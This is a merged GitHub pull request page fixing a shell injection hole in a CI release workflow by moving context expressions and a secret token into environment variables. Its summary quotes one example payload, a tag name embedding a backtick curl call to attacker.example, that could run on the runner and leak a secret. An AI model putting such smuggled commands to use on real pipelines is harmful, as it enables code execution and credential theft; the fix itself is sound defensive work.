Skip to content

fix(sec): eliminate shell injection via github context in release-core.yml#170

Merged
longieirl merged 2 commits into
mainfrom
fix/168-ci-shell-injection
May 4, 2026
Merged

fix(sec): eliminate shell injection via github context in release-core.yml#170
longieirl merged 2 commits into
mainfrom
fix/168-ci-shell-injection

Conversation

@longieirl
Copy link
Copy Markdown
Owner

@longieirl longieirl commented May 4, 2026

Summary

Fixes #168. Two run: steps in release-core.yml interpolated ${{ github.ref_name }} and other context expressions directly into shell scripts. A tag name containing shell metacharacters (e.g. core-v0.1.0`curl attacker.example`) would execute on the release runner, enabling exfiltration of the DOWNSTREAM_DISPATCH_TOKEN secret and arbitrary code execution.

Changes

  • Move github.ref_name, github.sha, github.repository, github.run_id, secrets.DOWNSTREAM_DISPATCH_TOKEN, and needs.validate.outputs.version into env: blocks on both affected steps
  • Reference them as shell variables (${GH_REF_NAME} etc.) in the run: scripts — shell variables are not subject to expression injection

Type

  • Security
  • Bug fix

Testing

  • Manually reviewed — workflow logic is unchanged, only the injection vector is removed
  • No new warnings
  • Tests pass (coverage ≥ 91%) — workflow-only change, no Python touched

Checklist

  • Code follows project style
  • Self-reviewed
  • Documentation updated (if needed) — N/A
  • No new warnings

Downstream impact

  • This PR changes a public interface in bankstatements_core

web-flow added 2 commits May 1, 2026 13:58
@web-flow
chore: add v0.1.4 changelog entry (CVE-2026-31789 fix)
5638c41
@web-flow
fix(sec): eliminate shell injection via github context in release-cor…
4886616 
…e.yml

Move all ${{ github.* }} and ${{ secrets.* }} interpolations out of run:
shell scripts and into env: blocks, then reference them as shell variables.
This prevents a malicious tag name from injecting arbitrary shell commands
into the release runner (closes #168).
@longieirl longieirl self-assigned this May 4, 2026
@github-actions github-actions Bot added bug Something isn't working documentation Improvements or additions to documentation ci labels May 4, 2026
@longieirl longieirl merged commit bd963c4 into main May 4, 2026
13 checks passed
@longieirl longieirl deleted the fix/168-ci-shell-injection branch May 4, 2026 10:16
@longieirl longieirl mentioned this pull request May 4, 2026
Merged
8 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

@longieirl longieirl

Labels

bug Something isn't working ci documentation Improvements or additions to documentation

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

sec: shell injection via github.ref_name in release-core.yml run steps

2 participants

@longieirl @web-flow